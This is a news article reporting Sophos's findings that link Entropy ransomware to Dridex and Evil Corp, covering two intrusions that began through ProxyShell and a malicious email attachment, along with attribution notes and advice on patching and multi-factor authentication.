Hackers use Dridex malware and Entropy ransomware on hacked computers as they continue to rebrand their extortion operations under a different name.
Cybersecurity firm Sophos has found similarities between the two in a report that said, “The similarities are in the software packer used to conceal the ransomware code, in the malware subroutines designed to find and obfuscate commands (API calls), and in the subroutines used to decrypt encrypted text.”
The similarities came to light after two different incidents targeting an unnamed media company and a regional government agency. The threat actors used Entropy ransomware to target networks with Cobalt Strike Beacons and Dridex, to gain remote access.
There have been some commonalities in the attacks though there were some differences with the initial access vector used to worm their way inside the networks, the length of time spent in each of the environments, and the malware employed to launch the final phase of the invasion.
The ProxyShell exploit to strike a vulnerable Exchange Server was used in the attack on the media organization to install a web shell. This shell was utilized to spread Cobalt Strike Beacons on the network. According to the threat actors, they spent nearly four months carrying out reconnaissance and data theft, finally managing to carry out the ransomware attack in early December 2021.
The second attack was carried out on the regional government organization using a malicious email attachment containing the Dridex malware, using it to deploy additional payloads for lateral movement.
Within 75 hours after the initial detection of the suspicious login attempt on a single machine, sensitive data was extracted to more than one cloud storage provider in the form of compressed RAR archives. This was prior to encrypting the files on the compromised computers.
The attackers used legitimate tools such as AdFind, PsExec, and PsKill to carry out the attacks. The Dridex and Entropy samples also showed correlation with that of previous DoppelPaymer ransomware infections has raised the possibility of a “common origin.”
Dridex Trojan is an information-stealing botnet developed by a prolific Russia-based cybercrime group called Indrik Spider (aka Evil Corp). While DoppelPaymer is attributed to a splinter group tracked under the moniker Doppel Spider. It leverages forked malware code developed by Indrik Spider, including the BitPaymer ransomware, as the foundation for its big game hunting operations.The ransomware infrastructure of the cybercriminals has been recycled to evade US sanctions such as WastedLocker, Hades, Phoenix, PayloadBIN, Grief, and Macaw. Entropy is likely the latest addition to this list. Looks like the malware operators borrowed code to either save development efforts or deliberately mislead attribution in what’s a false flag operation.
According to Andrew Brandt, principal researcher at Sophos, “In both cases, the attackers relied upon a lack of diligence – both targets had vulnerable Windows systems that lacked current patches and updates. Properly patched machines, like the Exchange Server, would have forced the attackers to work harder to make their initial access into the organizations they penetrated.”
Brandt added, “A requirement to use multi-factor authentication, had it been in place, would have created further challenges for unauthorized users to log in to those or other machines,”